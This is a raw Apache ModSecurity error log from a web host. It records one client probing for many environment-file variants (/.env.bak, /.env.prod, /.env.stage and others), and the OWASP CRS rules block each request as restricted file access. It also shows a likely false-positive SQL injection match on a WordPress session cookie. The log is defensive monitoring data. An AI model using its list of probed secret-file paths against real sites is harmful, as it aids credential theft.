[Mon May 11 14:09:49.288787 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.remote"] [unique_id "agHHDVchVQ3tCn0m9OpAgwAAAQ4"]
[Mon May 11 14:09:49.429025 2026] [core:error] [pid 1320674:tid 1320712] [client 52.242.216.199:59625] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:49.429066 2026] [core:error] [pid 1320674:tid 1320712] [client 52.242.216.199:59625] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:09:49.467380 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.bak"] [unique_id "agHHDVchVQ3tCn0m9OpAhAAAAQ4"]
[Mon May 11 14:09:49.467773 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.bak"] [unique_id "agHHDVchVQ3tCn0m9OpAhAAAAQ4"]
[Mon May 11 14:09:49.467954 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.bak"] [unique_id "agHHDVchVQ3tCn0m9OpAhAAAAQ4"]
[Mon May 11 14:09:49.468239 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.bak"] [unique_id "agHHDVchVQ3tCn0m9OpAhAAAAQ4"]
[Mon May 11 14:09:49.685460 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.backup"] [unique_id "agHHDVchVQ3tCn0m9OpAhgAAAQ4"]
[Mon May 11 14:09:49.685836 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.backup"] [unique_id "agHHDVchVQ3tCn0m9OpAhgAAAQ4"]
[Mon May 11 14:09:49.686017 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.backup"] [unique_id "agHHDVchVQ3tCn0m9OpAhgAAAQ4"]
[Mon May 11 14:09:49.686296 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.backup"] [unique_id "agHHDVchVQ3tCn0m9OpAhgAAAQ4"]
[Mon May 11 14:09:49.884289 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.save"] [unique_id "agHHDVchVQ3tCn0m9OpAiQAAAQ4"]
[Mon May 11 14:09:49.884686 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.save"] [unique_id "agHHDVchVQ3tCn0m9OpAiQAAAQ4"]
[Mon May 11 14:09:49.884870 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.save"] [unique_id "agHHDVchVQ3tCn0m9OpAiQAAAQ4"]
[Mon May 11 14:09:49.885126 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.save"] [unique_id "agHHDVchVQ3tCn0m9OpAiQAAAQ4"]
[Mon May 11 14:09:50.058341 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.old"] [unique_id "agHHDlchVQ3tCn0m9OpAjAAAAQ4"]
[Mon May 11 14:09:50.058741 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.old"] [unique_id "agHHDlchVQ3tCn0m9OpAjAAAAQ4"]
[Mon May 11 14:09:50.058926 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.old"] [unique_id "agHHDlchVQ3tCn0m9OpAjAAAAQ4"]
[Mon May 11 14:09:50.059219 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.old"] [unique_id "agHHDlchVQ3tCn0m9OpAjAAAAQ4"]
[Mon May 11 14:09:50.222393 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.sample"] [unique_id "agHHDlchVQ3tCn0m9OpAjgAAAQ4"]
[Mon May 11 14:09:50.222768 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.sample"] [unique_id "agHHDlchVQ3tCn0m9OpAjgAAAQ4"]
[Mon May 11 14:09:50.222958 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.sample"] [unique_id "agHHDlchVQ3tCn0m9OpAjgAAAQ4"]
[Mon May 11 14:09:50.223289 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.sample"] [unique_id "agHHDlchVQ3tCn0m9OpAjgAAAQ4"]
[Mon May 11 14:09:50.391962 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.example"] [unique_id "agHHDlchVQ3tCn0m9OpAjwAAAQ4"]
[Mon May 11 14:09:50.392368 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.example"] [unique_id "agHHDlchVQ3tCn0m9OpAjwAAAQ4"]
[Mon May 11 14:09:50.392555 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.example"] [unique_id "agHHDlchVQ3tCn0m9OpAjwAAAQ4"]
[Mon May 11 14:09:50.392782 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.example"] [unique_id "agHHDlchVQ3tCn0m9OpAjwAAAQ4"]
[Mon May 11 14:09:50.613977 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.dev"] [unique_id "agHHDlchVQ3tCn0m9OpAkQAAAQ4"]
[Mon May 11 14:09:50.614362 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.dev"] [unique_id "agHHDlchVQ3tCn0m9OpAkQAAAQ4"]
[Mon May 11 14:09:50.614554 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.dev"] [unique_id "agHHDlchVQ3tCn0m9OpAkQAAAQ4"]
[Mon May 11 14:09:50.614778 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.dev"] [unique_id "agHHDlchVQ3tCn0m9OpAkQAAAQ4"]
[Mon May 11 14:09:50.793278 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.prod"] [unique_id "agHHDlchVQ3tCn0m9OpAkgAAAQ4"]
[Mon May 11 14:09:50.793656 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.prod"] [unique_id "agHHDlchVQ3tCn0m9OpAkgAAAQ4"]
[Mon May 11 14:09:50.793835 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.env.prod"] [unique_id "agHHDlchVQ3tCn0m9OpAkgAAAQ4"]
[Mon May 11 14:09:50.794084 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.env.prod"] [unique_id "agHHDlchVQ3tCn0m9OpAkgAAAQ4"]
[Mon May 11 14:09:50.967072 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.env.stage"] [unique_id "agHHDlchVQ3tCn0m9OpAlAAAAQ4"]
[Mon May 11 14:09:50.967467 2026] [security2:error] [pid 1319885:tid 1319912] [client 54.255.173.22:43350] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: f884b2c740b85dfbc9c7b3f14af878cb||1778503185||1778502825"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/.env.stage"] [unique_id "agHHDlchVQ3tCn0m9OpAlAAAAQ4"]
